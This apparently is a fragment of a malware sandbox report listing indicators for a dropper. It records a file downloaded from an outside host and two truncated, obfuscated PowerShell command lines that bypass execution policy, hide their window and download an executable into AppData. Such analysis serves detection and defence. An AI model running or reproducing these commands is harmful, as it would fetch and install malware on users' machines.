Technical Information
- http://jsmkitchesadbedrooms.co.uk/expl1.exe as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWErsHelL.ExE -EXEcuTIOpoLIcY byPAss -NoProFIlE -WINdOwSTYle hIDdeN (Ew-obJeCt sysTeM.Net.WebCLieT).doWNlOADfILe('http://jsmkitchesadbedrooms.co.uk/expl1.exe','%AppDATa...
- '<SYSTEM32>\cmd.exe' /C "POWErsHelL.ExE -EXEcuTIOpoLIcY byPAss -NoProFIlE -WINdOwSTYle hIDdeN (Ew-obJeCt sysTeM.Net.WebCLieT).doWNlOADfILe('http://jsmkitchesadbedrooms.co.uk/expl1.exe','%AppDATa...' (with hidden window)